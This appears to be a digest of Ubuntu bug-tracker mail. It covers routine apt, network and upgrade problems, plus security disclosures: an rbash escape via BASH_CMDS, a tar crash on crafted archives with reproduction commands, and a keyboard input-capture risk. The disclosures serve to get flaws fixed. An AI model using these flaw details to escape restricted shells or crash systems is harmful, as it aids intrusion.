      if self._apt_pkg(package).installed:
    File "/usr/lib/python3/dist-packages/apport/packaging_impl.py", line 128, in _apt_pkg
      raise ValueError('package %s does not exist' % package)
  ValueError: package 32-lxd does not exist
  Preparing to unpack .../33-open-iscsi_2.0.874-5ubuntu9.1_amd64.deb ...
  Unpacking open-iscsi (2.0.874-5ubuntu9.1) over (2.0.874-5ubuntu2.4) ...
  Preparing to unpack .../34-poppler-data_0.4.9-2_all.deb ...
  Unpacking poppler-data (0.4.9-2) over (0.4.8-2) ...
  Preparing to unpack .../35-tasksel-data_3.34ubuntu12_all.deb ...
  Unpacking tasksel-data (3.34ubuntu12) over (3.34ubuntu11) ...
  Preparing to unpack .../36-tasksel_3.34ubuntu12_all.deb ...
  Unpacking tasksel (3.34ubuntu12) over (3.34ubuntu11) ...
  Preparing to unpack .../37-libsepol1_2.8-1_amd64.deb ...
  Unpacking libsepol1:amd64 (2.8-1) over (2.7-1) ...
  Errors were encountered while processing:
   /tmp/apt-dpkg-install-gdCSiW/32-lxd_1%3a0.4_all.deb
  Exception during pm.DoInstall():  E:Sub-process /usr/bin/dpkg returned an error code (1)

  *** 

[Touch-packages] [Bug 1803441] Re: BASH_CMDS is writable in restricted bash shells (fixed upstream, need to backport patch)

2019-03-26 Thread Seth Arnold
I'm sorry Riccardo, I didn't notice the two separate BASH_CMDS issues when 
I filed the request. The only mention in the changelog is:

> This document details the changes between this version, bash-4.4-beta2,
> and the previous version, bash-4.4-rc1.
>
> [...]
>
> d.  Fixed a bug that allowed assignments to BASH_CMDS when the shell was
> in restricted mode.

http://git.savannah.gnu.org/cgit/bash.git/tree/CHANGES?h=bash-4.4-testing#n65

I did not find a single well-defined patch or commit for this, so
completely overlooked that there are multiple issues.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to bash in Ubuntu.
https://bugs.launchpad.net/bugs/1803441

Title:
  BASH_CMDS is writable in restricted bash shells (fixed upstream, need
  to backport patch)

Status in bash package in Ubuntu:
  New

Bug description:
  In 14.04 LTS, the BASH_CMDS variable is writable in rbash. This allows
  a trivial escape from rbash to run arbitrary shell commands.

  This issue is fixed upstream:
  http://git.savannah.gnu.org/cgit/bash.git/tree/CHANGES?h=bash-4.4-testing#n65

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/bash/+bug/1803441/+subscriptions



[Touch-packages] [Bug 1821634] [NEW] BZ2_bzread: [...] Read error (-5: DATA_ERROR_MAGIC)

2019-03-25 Thread Seth Arnold
Public bug reported:

I have apt configured to load a wide variety of sources; my apt is using
a local squid-deb-proxy on the same system, and the source that is
failing is hosted on an archive mirror on my LAN.

Today I noticed unexpected results from apt-get update:

# apt-get update
Hit:1 http://wopr/ubuntu bionic InRelease
Hit:2 http://wopr/ubuntu bionic-updates InRelease
[...]
Get:45 http://archive.canonical.com/ubuntu precise Release.gpg [181 B]   
Hit:46 http://ftp.debian.org/debian stretch Release 
 
Ign:26 http://wopr/ubuntu precise Release.gpg  
Ign:49 http://wopr/ubuntu precise/restricted Sources
Ign:50 http://wopr/ubuntu precise/multiverse Sources
Ign:48 http://wopr/ubuntu precise/main Sources  
Hit:49 http://wopr/ubuntu precise/restricted Sources
Ign:50 http://wopr/ubuntu precise/multiverse Sources
Hit:51 http://wopr/ubuntu precise/universe Sources
Ign:51 http://wopr/ubuntu precise/universe Sources 
Err:50 http://wopr/ubuntu precise/multiverse Sources
  Could not open file /var/lib/apt/lists/partial/wopr_ubuntu_dists_precise_multiverse_source_Sources.bz2 - open (13: Permission denied) [IP: 127.0.0.1 8000]
Ign:29 http://ftp.debian.org/debian unstable InRelease
Ign:48 http://wopr/ubuntu precise/main Sources
Ign:34 http://ftp.debian.org/debian testing InRelease
Ign:45 http://archive.canonical.com/ubuntu precise Release.gpg
Hit:55 http://archive.canonical.com/ubuntu precise/partner Sources
Ign:55 http://archive.canonical.com/ubuntu precise/partner Sources
Hit:55 http://archive.canonical.com/ubuntu precise/partner Sources
Fetched 670 kB in 7s (101 kB/s)
Reading package lists... Done
W: GPG error: http://wopr/ubuntu precise-updates InRelease: The following signatures were invalid: 630239CC130E1A7FD81A27B140976EAF437D05B5
W: GPG error: http://wopr/ubuntu precise-security InRelease: The following signatures were invalid: 630239CC130E1A7FD81A27B140976EAF437D05B5
W: GPG error: http://wopr/ubuntu precise-proposed InRelease: The following signatures were invalid: 630239CC130E1A7FD81A27B140976EAF437D05B5
W: GPG error: http://wopr/ubuntu precise Release: The following signatures were invalid: 630239CC130E1A7FD81A27B140976EAF437D05B5
W: GPG error: http://ftp.debian.org/debian unstable InRelease: The following signatures couldn't be verified because the public key is not available: NO_PUBKEY 7638D0442B90D010 NO_PUBKEY 04EE7237B7D453EC
W: GPG error: http://ftp.debian.org/debian testing InRelease: The following signatures couldn't be verified because the public key is not available: NO_PUBKEY 7638D0442B90D010 NO_PUBKEY 04EE7237B7D453EC
W: GPG error: http://archive.canonical.com/ubuntu precise Release: The following signatures were invalid: 630239CC130E1A7FD81A27B140976EAF437D05B5
E: Failed to fetch http://wopr/ubuntu/dists/precise/multiverse/source/Sources  Could not open file /var/lib/apt/lists/partial/wopr_ubuntu_dists_precise_multiverse_source_Sources.bz2 - open (13: Permission denied) [IP: 127.0.0.1 8000]
E: Failed to fetch http://wopr/ubuntu/dists/precise/universe/source/Sources.gz  BZ2_bzread: /var/lib/apt/lists/partial/wopr_ubuntu_dists_precise_universe_source_Sources.bz2 Read error (-5: DATA_ERROR_MAGIC)
E: Some index files failed to download. They have been ignored, or old ones used instead.


The unexpected lines are the E: lines.


The permission denied line doesn't make sense to me because the permissions 
*after* the apt-get update run look fine:

# namei -l /var/lib/apt/lists/partial/wopr_ubuntu_dists_precise_multiverse_source_Sources.bz2
f: /var/lib/apt/lists/partial/wopr_ubuntu_dists_precise_multiverse_source_Sources.bz2
drwxr-xr-x root root /
drwxr-xr-x root root var
drwxr-xr-x root root lib
drwxr-xr-x root root apt
drwxr-xr-x root root lists
drwx-- _apt root partial
lrwxrwxrwx root root wopr_ubuntu_dists_precise_multiverse_source_Sources.bz2 -> /var/lib/apt/lists/wopr_ubuntu_dists_precise_multiverse_source_Sources
drwxr-xr-x root root   /
drwxr-xr-x root root   var
drwxr-xr-x root root   lib
drwxr-xr-x root root   apt
drwxr-xr-x root root   lists
-rw-r--r-- root root   wopr_ubuntu_dists_precise_multiverse_source_Sources

The DATA_ERROR_MAGIC makes enough sense -- the symlink name has .bz2,
but the file it points to is a plaintext file:

2f0deae62e2cf7e5257bbd858cb0bf2a94122c4eb82be13e13768d0b9ce84c9e  /var/lib/apt/lists/wopr_ubuntu_dists_precise_multiverse_source_Sources


This hash is listed in my mirror's Release file:

$ grep 2f0deae62e2cf7e5257bbd858cb0bf2a94122c4eb82be13e13768d0b9ce84c9e Release
 2f0deae62e2cf7e5257bbd858cb0bf2a94122c4eb82be13e13768d0b9ce84c9e   628753 multiverse/source/Sources

[Touch-packages] [Bug 1803441] Re: BASH_CMDS is writable in restricted bash shells (fixed upstream, need to backport patch)

2019-03-22 Thread Seth Arnold
CVE-2019-9924

Thanks

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2019-9924

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to bash in Ubuntu.
https://bugs.launchpad.net/bugs/1803441

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/bash/+bug/1803441/+subscriptions



[Touch-packages] [Bug 1821364] Re: xfce4 install on Ubuntu 18.04 has no polkit agent

2019-03-22 Thread Seth Arnold
** Package changed: dbus (Ubuntu) => xfce4 (Ubuntu)

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to dbus in Ubuntu.
https://bugs.launchpad.net/bugs/1821364

Title:
  xfce4 install on Ubuntu 18.04 has no polkit agent

Status in xfce4 package in Ubuntu:
  New

Bug description:
  The problem was evident as an error message when trying to run 'Language
  Support' (gnome-language-selector) after install. (This was the
  advised way to get the Atom spell-checker working).

  Error described here:
  https://askubuntu.com/questions/1031319/language-support-in-18-04-not-working-org-freedesktop-policykiterror-failed/1127862#1127862

  It occurred on a fresh install of Ubuntu 18.04 after installing xfce4.

  No PolicyKit Authentication Agent was installed - or at least not one
  that xfce seemed to recognise.

  I solved the problem by installing one:

  $ sudo apt install policykit-1-gnome

  That installed the package:
  /usr/lib/policykit-1-gnome/polkit-gnome-authentication-agent-1.

  It seemed to update the autostart list.

  Though there is such a thing as 'xfce-polkit' and 'xfce-polkit-git', I
  could not see them on my machine and Debian [reports][3], in its
  account of the package policykit-1-gnome, that xfce still uses the
  gnome polkit agent:

  "This implementation was originally designed for GNOME 2, but most
  GNOME-based desktop environments, including GNOME 3, GNOME Flashback,
  and MATE, have their own built-in PolicyKit agents and no longer use
  this one. The remaining users of this implementation are Cinnamon,
  XFCE and Unity."

  (https://packages.debian.org/sid/policykit-1-gnome)

  It is worth noting that the terminal emulator that comes default in
  Ubuntu and is still default after installing xfce (gnome terminal)
  would not run polkit-gnome-authentication-agent-1 after install. I
  understand it may have been necessary, perhaps ironically, to run it
  in an xterm. I didn't attempt this. But all was well after restart.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/xfce4/+bug/1821364/+subscriptions



[Touch-packages] [Bug 1810241] Re: NULL dereference when decompressing specially crafted archives

2019-03-22 Thread Seth Arnold
Use CVE-2019-9923.

Thanks

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2019-9923

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to tar in Ubuntu.
https://bugs.launchpad.net/bugs/1810241

Title:
  NULL dereference when decompressing specially crafted archives

Status in tar package in Ubuntu:
  New

Bug description:
  Hi,

  Fuzzing tar with checksums disabled reveals a NULL pointer dereference
  when parsing certain archives that have malformed extended headers.
  This affects tar from (at least) Trusty, Bionic and Cosmic. I haven't
  tested Xenial's version.

  A test case with fixed checksums is attached. To avoid breaking
  anything that looks inside tar archives, I have converted it to text
  with xxd. To reproduce:

  $ xxd -r gnutar-crash.tar.txt gnutar-crash.tar
  $ tar Oxf gnutar-crash.tar 
  tar: Ignoring unknown extended header keyword 'GNU.sparse.minTr'
  tar: Malformed extended header: missing length
  Segmentation fault (core dumped)

  I have also attached a patch against the latest upstream git and
  against 1.30 (in Cosmic). This fixes the issue by detecting the null
  result before it is dereferenced.

  Regards,
  Daniel

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/tar/+bug/1810241/+subscriptions



[Touch-packages] [Bug 1594863] Re: OSK consideration for life cycle changes in unity8 windowed mode

2019-03-20 Thread Seth Arnold
** Information type changed from Private Security to Public Security

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to ubuntu-keyboard in Ubuntu.
https://bugs.launchpad.net/bugs/1594863

Title:
  OSK consideration for life cycle changes in unity8 windowed mode

Status in qtmir package in Ubuntu:
  In Progress
Status in ubuntu-keyboard package in Ubuntu:
  In Progress

Bug description:
  Access to the On-Screen-Keyboard, as provided by Maliit, is predicated
  on the application being “active”. Unity8’s life cycle management, in
  small screen devices had always stopped (via SIGSTOP) any application
  which was not the top most application. From a security perspective
  this provided protection from a nefarious app from taking over, while
  in the background, to the input stream of the user’s interaction with
  the top-most active application. With the advent of convergence,
  unity8’s life cycle management has grown to accommodate both small
  screen and large screen device configurations. For large screens,
  “windowed mode” is a mode that can be auto & user activated based on
  screen size and presence of keyboard/mouse. During “windowed mode” the
  life cycle permits applications to remain “active” if they are visible
  but not the top-most or “focused” application (the user experience
  example is working on a document in the top-most window while watching
  video in an active but unfocused window). Remaining active, while not
  in the user’s “focus” creates a risk in that an application could
  connect to Maliit and take over the user’s input intended for the
  focused application. So while this is bad, the top-most application
  will not reflect the input, as it would be consumed by the nefarious
  app. It’s worth noting this risk does not exist with hardware keyboard
  input, which is the largest majority of expected use case. Security
  team would classify the severity as “medium” but we need to treat with
  priority and sensitivity due to the marketing investment we have made
  in touting the security of Unity8/Mir.

  our plan of attack is covered in this document
  
https://docs.google.com/document/d/1Y7p_8jee6Kiv4KQwZBClFl23RGFVFfBKoOcMh9ymdqw

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/qtmir/+bug/1594863/+subscriptions



Re: [Touch-packages] [Bug 1821052] Re: No connexion with mobile broadband

2019-03-20 Thread Seth Arnold
On Wed, Mar 20, 2019 at 07:25:35PM -, Edhelharn wrote:
> My sources.list file (updated) :
> 
> #deb http://fr.archive.ubuntu.com/ubuntu/ bionic main restricted
> #deb http://fr.archive.ubuntu.com/ubuntu/ bionic-updates main restricted
> #deb http://fr.archive.ubuntu.com/ubuntu/ bionic universe
> #deb http://fr.archive.ubuntu.com/ubuntu/ bionic-updates universe
> #deb http://fr.archive.ubuntu.com/ubuntu/ bionic multiverse
> #deb http://fr.archive.ubuntu.com/ubuntu/ bionic-updates multiverse
> #deb http://fr.archive.ubuntu.com/ubuntu/ bionic-backports main restricted universe multiverse
> #deb http://security.ubuntu.com/ubuntu bionic-security main restricted
> #deb http://security.ubuntu.com/ubuntu bionic-security universe
> #deb http://security.ubuntu.com/ubuntu bionic-security multiverse
> deb http://fr.archive.ubuntu.com/ubuntu/ bionic-proposed restricted main multiverse universe

You're currently configured to install *only* packages from bionic's
-proposed pocket. Why are the other sources disabled?

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to network-manager in Ubuntu.
https://bugs.launchpad.net/bugs/1821052

Title:
  Unavailable connexion with mobile broadband DW5811e Snapdragon™ X7 LTE

Status in network-manager package in Ubuntu:
  New

Bug description:
  Hello,

  I'm trying to connect internet with mobile broadband module card
  DW5811e Snapdragon™ X7 LTE but when I finished to set in GUI, asked
  informations, anything happens. (screenshot join) Message in
  Network-Manager says "unavailable".

  I am using Ubuntu 18.04.2 LTS.

  I tested the module under Linux Mint LMDE 3 Cindy with a LIVE USB and
  it works good.

  I can give some information about the card and connection :

  sudo mmcli -m 0

  /org/freedesktop/ModemManager1/Modem/0 (device id 'hidden by me')
  -------------------------
  Hardware |    manufacturer: 'Dell'
           |           model: 'MBIM [413C:81B6]'
           |        revision: 'SWI9X30C_02.24.05.06'
           |       supported: 'gsm-umts, lte'
           |         current: 'gsm-umts, lte'
           |    equipment id: 'hidden by me'
  -------------------------
  System   |          device: '/sys/devices/pci:00/:00:14.0/usb2/2-2'
           |         drivers: 'cdc_mbim'
           |          plugin: 'Dell'
           |    primary port: 'cdc-wdm1'
           |           ports: 'cdc-wdm1 (mbim), wwp0s20f0u2i12 (net)'
  -------------------------
  Numbers  |            own : 'unknown'
  -------------------------
  Status   |            lock: 'none'
           |  unlock retries: 'sim-pin2 (3)'
           |           state: 'disabled'
           |     power state: 'on'
           |     access tech: 'unknown'
           |  signal quality: '0' (cached)
  -------------------------
  Modes    |       supported: 'allowed: 3g, 4g; preferred: none'
           |         current: 'allowed: 3g, 4g; preferred: none'
  -------------------------
  Bands    |       supported: 'unknown'
           |         current: 'unknown'
  -------------------------
  IP       |       supported: 'ipv4, ipv6, ipv4v6'
  -------------------------
  3GPP     |            imei: '(hidden by me)'
           |   enabled locks: 'fixed-dialing'
           |     operator id: 'unknown'
           |   operator name: 'unknown'
           |    subscription: 'unknown'
           |    registration: 'unknown'
  -------------------------
  SIM      |            path: '/org/freedesktop/ModemManager1/SIM/0'
  -------------------------
  Bearers  |           paths: 'none'

  ProblemType: Bug
  DistroRelease: Ubuntu 18.04
  Package: network-manager-config-connectivity-ubuntu 1.10.6-2ubuntu1.1
  ProcVersionSignature: Ubuntu 4.18.0-16.17~18.04.1-generic 4.18.20
  Uname: Linux 4.18.0-16-generic x86_64
  ApportVersion: 2.20.9-0ubuntu7.6
  Architecture: amd64
  CurrentDesktop: ubuntu:GNOME
  Date: Wed Mar 20 18:07:34 2019
  IfupdownConfig:
   # interfaces(5) file used by ifup(8) and ifdown(8)
   auto lo
   iface lo inet loopback
  InstallationDate: Installed on 2019-03-15 (4 days ago)
  InstallationMedia: Ubuntu 18.04.2 LTS "Bionic Beaver" - Release amd64 
(20190210)
  IpRoute:
   default via 192.168.42.129 dev enp0s20f0u9 proto dhcp metric 100 
   169.254.0.0/16 dev enp0s20f0u9 scope link metric 1000 
   192.168.42.0/24 dev enp0s20f0u9 proto kernel scope link src 192.168.42.245 
metric 100
  NetworkManager.state:
   [main]
   NetworkingEnabled=true
   WirelessEnabled=true
   WWANEnabled=false
  PackageArchitecture: all
  ProcEnviron:
   PATH=(custom, no user)
   XDG_RUNTIME_DIR=
   LANG=fr_FR.UTF-8
   SHELL=/bin/bash
  SourcePackage: network-manager
  UpgradeStatus: No upgrade log present (probably fresh install)
  nmcli-con:
   NAME UUID  TYPE  
TIMESTAMP   TIMESTAMP-REAL  AUTOCONNECT  AUTOCONNECT-PRIORITY  

[Touch-packages] [Bug 1821052] Re: No connexion with mobile broadband

2019-03-20 Thread Seth Arnold
** Information type changed from Private Security to Public Security

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to network-manager in Ubuntu.
https://bugs.launchpad.net/bugs/1821052

Title:
  No connexion with mobile broadband

Status in network-manager package in Ubuntu:
  New

Bug description:
  Hello,

  I'm trying to connect internet with mobile broadband module card
  DW5811e Snapdragon™ X7 LTE but when I finished to set in GUI, asked
  informations, anything happens. (screenshot join) Message in Network-
  Manager says "unavailable".

  I am using Ubuntu 18.04.2 LTS.

  I tested the module under Linux Mint LMDE 3 Cindy with a LIVE USB and
  it works good.

  I can give some information about the card and connection :

  sudo mmcli -m 0

  /org/freedesktop/ModemManager1/Modem/0 (device id 'hidden by me')
  -------------------------
  Hardware |   manufacturer: 'Dell'
           |          model: 'MBIM [413C:81B6]'
           |       revision: 'SWI9X30C_02.24.05.06'
           |      supported: 'gsm-umts, lte'
           |        current: 'gsm-umts, lte'
           |   equipment id: 'hidden by me'
  -------------------------
  System   |         device: '/sys/devices/pci:00/:00:14.0/usb2/2-2'
           |        drivers: 'cdc_mbim'
           |         plugin: 'Dell'
           |   primary port: 'cdc-wdm1'
           |          ports: 'cdc-wdm1 (mbim), wwp0s20f0u2i12 (net)'
  -------------------------
  Numbers  |           own : 'unknown'
  -------------------------
  Status   |           lock: 'none'
           | unlock retries: 'sim-pin2 (3)'
           |          state: 'disabled'
           |    power state: 'on'
           |    access tech: 'unknown'
           | signal quality: '0' (cached)
  -------------------------
  Modes    |      supported: 'allowed: 3g, 4g; preferred: none'
           |        current: 'allowed: 3g, 4g; preferred: none'
  -------------------------
  Bands    |      supported: 'unknown'
           |        current: 'unknown'
  -------------------------
  IP       |      supported: 'ipv4, ipv6, ipv4v6'
  -------------------------
  3GPP     |           imei: '(hidden by me)'
           |  enabled locks: 'fixed-dialing'
           |    operator id: 'unknown'
           |  operator name: 'unknown'
           |   subscription: 'unknown'
           |   registration: 'unknown'
  -------------------------
  SIM      |           path: '/org/freedesktop/ModemManager1/SIM/0'

  -------------------------
  Bearers  |          paths: 'none'

  ProblemType: Bug
  DistroRelease: Ubuntu 18.04
  Package: network-manager-config-connectivity-ubuntu 1.10.6-2ubuntu1.1
  ProcVersionSignature: Ubuntu 4.18.0-16.17~18.04.1-generic 4.18.20
  Uname: Linux 4.18.0-16-generic x86_64
  ApportVersion: 2.20.9-0ubuntu7.6
  Architecture: amd64
  CurrentDesktop: ubuntu:GNOME
  Date: Wed Mar 20 18:07:34 2019
  IfupdownConfig:
   # interfaces(5) file used by ifup(8) and ifdown(8)
   auto lo
   iface lo inet loopback
  InstallationDate: Installed on 2019-03-15 (4 days ago)
  InstallationMedia: Ubuntu 18.04.2 LTS "Bionic Beaver" - Release amd64 
(20190210)
  IpRoute:
   default via 192.168.42.129 dev enp0s20f0u9 proto dhcp metric 100 
   169.254.0.0/16 dev enp0s20f0u9 scope link metric 1000 
   192.168.42.0/24 dev enp0s20f0u9 proto kernel scope link src 192.168.42.245 
metric 100
  NetworkManager.state:
   [main]
   NetworkingEnabled=true
   WirelessEnabled=true
   WWANEnabled=false
  PackageArchitecture: all
  ProcEnviron:
   PATH=(custom, no user)
   XDG_RUNTIME_DIR=
   LANG=fr_FR.UTF-8
   SHELL=/bin/bash
  SourcePackage: network-manager
  UpgradeStatus: No upgrade log present (probably fresh install)
  nmcli-con:
   NAME UUID  TYPE  
TIMESTAMP   TIMESTAMP-REAL  AUTOCONNECT  AUTOCONNECT-PRIORITY  
READONLY  DBUS-PATH   ACTIVE  DEVICE   
STATE  ACTIVE-PATH SLAVE 
   Connexion filaire 2  eb77c09e-864c-349d-bd6b-6cb8895377fe  ethernet  
1553101500  mer. 20 mars 2019 18:05:00 CET  yes  4294966297
no/org/freedesktop/NetworkManager/Settings/4  yes enp0s20f0u9  
activated  /org/freedesktop/NetworkManager/ActiveConnection/2  --
   Connexion filaire 1  b2ad30fe-7283-3e17-b614-61743aae30d1  ethernet  
1553020238  mar. 19 mars 2019 19:30:38 CET  yes  4294966297
no/org/freedesktop/NetworkManager/Settings/1  no  --   --   
  --  --
  nmcli-nm:
   RUNNING  VERSION  STATE  STARTUP  CONNECTIVITY  NETWORKING  WIFI-HW  
WIFI WWAN-HW  WWAN 
   running  1.10.6   connected  started  full  enabled enabled  
enabled  enabled  disabled

To manage notifications about this bug 

[Touch-packages] [Bug 1819817] Re: package libselinux1:amd64 2.7-2build2 failed to install/upgrade: пакет libselinux1:amd64 2.7-2build2 не может быть настроен, так как libselinux1:i386 другой версии (

2019-03-13 Thread Seth Arnold
Hello,

dpkg: ошибка при обработке пакета libselinux1:amd64 (--configure):
 пакет libselinux1:amd64 2.7-2build2 не может быть настроен, так как 
libselinux1:i386 другой версии (2.2.2-1ubuntu0.1)

You have an i386 version of 14.04's libselinux1 installed and the
upgrade tool tried to install the amd64 version of 18.04's libselinux1.

None of the tools expect to skip an LTS release; I don't know how well
upgrading from 14.04 LTS to 18.04 LTS directly will go. Does this sound
familiar?

The tools also expect i386 and amd64 versions of packages to be kept in
lockstep if you are going to have them both installed simultaneously. If
you don't know why the i386 versions are installed, maybe you can make
some progress by purging them with e.g. apt-get purge libselinux1:i386

I hope this helps.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to libselinux in Ubuntu.
https://bugs.launchpad.net/bugs/1819817

Title:
  package libselinux1:amd64 2.7-2build2 failed to install/upgrade: пакет
  libselinux1:amd64 2.7-2build2 не может быть настроен, так как
  libselinux1:i386 другой версии (2.2.2-1ubuntu0.1)

Status in libselinux package in Ubuntu:
  New

Bug description:
  1) The release of Ubuntu you are using, via 'lsb_release -rd' or System -> 
About Ubuntu
  Ubuntu 14.04 LTS.

  2) The version of the package you are using, via 'apt-cache policy pkgname' 
or by checking in Software Center
  apt-cache policy libselinux1
  libselinux1:
Installed: 2.7-2build2
Candidate: 2.7-2build2
Version table:
   *** 2.7-2build2 0
  500 http://ru.archive.ubuntu.com/ubuntu/ bionic/main amd64 Packages
  100 /var/lib/dpkg/status

  3) What you expected to happen
  do-release-upgrade
  My system upgraded from 14.04 to 16.04 smoothly

  4) What happened instead
  do-release-upgrade
Considering binutils-common:amd64 0 as a solution to binutils:amd64 12
Holding Back binutils:amd64 rather than change binutils-common:amd64
  Investigating (6) libc6-dev [ amd64 ] < 2.19-0ubuntu6.14 -> 2.27-3ubuntu1 > ( 
libdevel )
  Broken libc6-dev:amd64 Ломает on binutils [ amd64 ] < 2.24-5ubuntu14.2 -> 
2.30-21ubuntu1~18.04 > ( devel ) (< 2.26)
Considering binutils:amd64 12 as a solution to libc6-dev:amd64 39
Upgrading binutils:amd64 due to Breaks field in libc6-dev:amd64
  Investigating (6) binutils [ amd64 ] < 2.24-5ubuntu14.2 -> 
2.30-21ubuntu1~18.04 > ( devel )
  Broken binutils:amd64 Зависит on binutils-common [ amd64 ] < none -> 
2.30-21ubuntu1~18.04 > ( devel ) (= 2.30-21ubuntu1~18.04)
Considering binutils-common:amd64 0 as a solution to binutils:amd64 12
Holding Back binutils:amd64 rather than change binutils-common:amd64
  Investigating (7) libc6-dev [ amd64 ] < 2.19-0ubuntu6.14 -> 2.27-3ubuntu1 > ( 
libdevel )
  Broken libc6-dev:amd64 Ломает on binutils [ amd64 ] < 2.24-5ubuntu14.2 -> 
2.30-21ubuntu1~18.04 > ( devel ) (< 2.26)
Considering binutils:amd64 12 as a solution to libc6-dev:amd64 39
Upgrading binutils:amd64 due to Breaks field in libc6-dev:amd64
  Investigating (7) binutils [ amd64 ] < 2.24-5ubuntu14.2 -> 
2.30-21ubuntu1~18.04 > ( devel )
  Broken binutils:amd64 Зависит on binutils-common [ amd64 ] < none -> 
2.30-21ubuntu1~18.04 > ( devel ) (= 2.30-21ubuntu1~18.04)
Considering binutils-common:amd64 0 as a solution to binutils:amd64 12
Holding Back binutils:amd64 rather than change binutils-common:amd64
  Investigating (8) libc6-dev [ amd64 ] < 2.19-0ubuntu6.14 -> 2.27-3ubuntu1 > ( 
libdevel )
  Broken libc6-dev:amd64 Ломает on binutils [ amd64 ] < 2.24-5ubuntu14.2 -> 
2.30-21ubuntu1~18.04 > ( devel ) (< 2.26)
Considering binutils:amd64 12 as a solution to libc6-dev:amd64 39
Upgrading binutils:amd64 due to Breaks field in libc6-dev:amd64
  Investigating (8) binutils [ amd64 ] < 2.24-5ubuntu14.2 -> 
2.30-21ubuntu1~18.04 > ( devel )
  Broken binutils:amd64 Зависит on binutils-common [ amd64 ] < none -> 
2.30-21ubuntu1~18.04 > ( devel ) (= 2.30-21ubuntu1~18.04)
Considering binutils-common:amd64 0 as a solution to binutils:amd64 12
Holding Back binutils:amd64 rather than change binutils-common:amd64
  Investigating (9) libc6-dev [ amd64 ] < 2.19-0ubuntu6.14 -> 2.27-3ubuntu1 > ( 
libdevel )
  Broken libc6-dev:amd64 Ломает on binutils [ amd64 ] < 2.24-5ubuntu14.2 -> 
2.30-21ubuntu1~18.04 > ( devel ) (< 2.26)
Considering binutils:amd64 12 as a solution to libc6-dev:amd64 39
Upgrading binutils:amd64 due to Breaks field in libc6-dev:amd64
  Investigating (9) binutils [ amd64 ] < 2.24-5ubuntu14.2 -> 
2.30-21ubuntu1~18.04 > ( devel )
  Broken binutils:amd64 Зависит on binutils-common [ amd64 ] < none -> 
2.30-21ubuntu1~18.04 > ( devel ) (= 2.30-21ubuntu1~18.04)
Considering binutils-common:amd64 0 as a solution to binutils:amd64 12
Holding Back binutils:amd64 rather than change binutils-common:amd64
  Done

  Повреждённые пакеты

  Система содержит повреждённые пакеты, которые не 

Re: [Touch-packages] [Bug 1797386] Re: [SRU] OpenSSL 1.1.1 to 18.04 LTS

2019-03-12 Thread Seth Arnold
On Tue, Mar 12, 2019 at 04:05:45PM -, Dimitri John Ledkov wrote:
> defaults. And all of them however have committed to drop support for
> those in 2020. My expectation is to follow suit, and set default
> security level to 2, and require TLS1.2 shortly after 19.10 release.

Can you expand upon this point a bit?

Do you mean we will require tls 1.2 across all our supported releases
at the same time?

Or do you mean we will require tls 1.2 for 19.10 and newer? Will this be
done as part of rolling out 19.10 or will we push an update to 19.10 that
will change behaviour?

Or something else?

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssl in Ubuntu.
https://bugs.launchpad.net/bugs/1797386

Title:
  [SRU] OpenSSL 1.1.1 to 18.04 LTS

Status in openssl package in Ubuntu:
  In Progress
Status in libio-socket-ssl-perl source package in Bionic:
  New
Status in libnet-ssleay-perl source package in Bionic:
  New
Status in nova source package in Bionic:
  New
Status in openssl source package in Bionic:
  Incomplete
Status in python-cryptography source package in Bionic:
  New
Status in python2.7 source package in Bionic:
  New
Status in python3.6 source package in Bionic:
  New
Status in python3.7 source package in Bionic:
  New
Status in r-cran-openssl source package in Bionic:
  Fix Committed
Status in ruby-openssl source package in Bionic:
  Fix Committed
Status in ruby2.5 source package in Bionic:
  New

Bug description:
  [Impact]

   * OpenSSL 1.1.1 is an LTS release upstream, which will continue to
  receive security support for much longer than 1.1.0 series will.

   * OpenSSL 1.1.1 comes with support for TLS v1.3 which is expected to
  be rapidly adopted due to increased set of supported hashes & algoes,
  as well as improved handshake [re-]negotiation.

   * OpenSSL 1.1.1 comes with improved hw-acceleration capabilities.

   * OpenSSL 1.1.1 is ABI/API compatible with 1.1.0, however some
  software is sensitive to the negotiation handshake and may either need
  patches/improvements or clamp-down to maximum v1.2.

  [Test Case]

   * Rebuild all reverse dependencies

   * Execute autopkg tests for all of them

   * Clamp down to TLS v1.2 software that does not support TLS v1.3
  (e.g. mongodb)

   * Backport TLS v1.3 support patches, where applicable

  [Regression Potential]

   * Connectivity interop is the biggest issues which will be
  unavoidable with introducing TLS v1.3. However, tests on cosmic
  demonstrate that curl/nginx/google-chrome/mozilla-firefox connect and
  negotiate TLS v1.3 without issues.

   * Mitigation of discovered connectivity issues will be possible by
  clamping down to TLS v1.2 in either server-side or client-side
  software or by backporting relevant support fixes

   * Notable changes are listed here
  https://wiki.openssl.org/index.php/TLS1.3

   * Most common connectivity issues so far:
     - client verifies SNI in TLSv1.3 mode, yet client doesn't set hostname. 
Solution is client change to set hostname, or to clamp down the client to 
TLSv1.2.

     - session negotiation is different in TLSv1.3, existing client code
  may fail to create/negotiate/resume session. Clients need to learn how
  to use session callback.

   * This update bundles python 3.6 and 3.7 point releases

  [Other Info]

   * Previous FFe for OpenSSL in 18.10 is at
     https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/1793092

   * TLS v1.3 support in NSS is expected to make it to 18.04 via
  security updates

   * TLS v1.3 support in GnuTLS is expected to be available in 19.04

   * Test OpenSSL is being prepared in
     https://launchpad.net/~ci-train-ppa-service/+archive/ubuntu/3473

To manage notifications about this bug go to:
